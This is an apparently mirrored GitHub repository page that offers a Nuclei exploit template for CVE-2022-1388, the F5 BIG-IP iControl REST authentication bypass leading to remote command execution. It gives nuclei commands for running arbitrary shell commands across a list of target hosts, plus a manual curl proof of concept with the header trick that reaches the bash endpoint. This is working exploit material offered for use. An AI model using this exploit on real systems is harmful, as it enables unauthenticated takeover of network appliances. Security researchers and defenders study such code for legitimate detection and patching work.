Giters

MrCl0wnLab / Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter

CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP addresses of devices that use BIG-IP. Exploitation would allow the attacker to execute arbitrary system commands, create and delete files and disable services.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

cve-2022-1388f5-bigipnucleinuclei-templatesbigipbigip-rest-apiexploit

Nuclei Template Exploit F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter

CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP addresses of devices that use BIG-IP. Exploitation would allow the attacker to execute arbitrary system commands, create and delete files and disable services.

This template use token-spray / nuclei's CLI variable

This nuclei-template accepts shell parameter for exploitation. We wanted to test tokens obtained from another workflow or a manual search, so we used nuclei's CLI variable feature to dynamically feed a single token value or list of tokens into these templates at run time

-V, -var value custom vars in var=value format

nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

Captura de tela de 2022-05-10 01-28-12

POC Manual

curl -su admin \ 
-H "Host: localhost:8100" \ 
-H "Content-Type: application/json" \ 
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \ 
-H "Authorization: Basic YWRtaW46" \
 http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'

Additional Details

References

About

CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP addresses of devices that use BIG-IP. Exploitation would allow the attacker to execute arbitrary system commands, create and delete files and disable services.

cve-2022-1388f5-bigipnucleinuclei-templatesbigipbigip-rest-apiexploit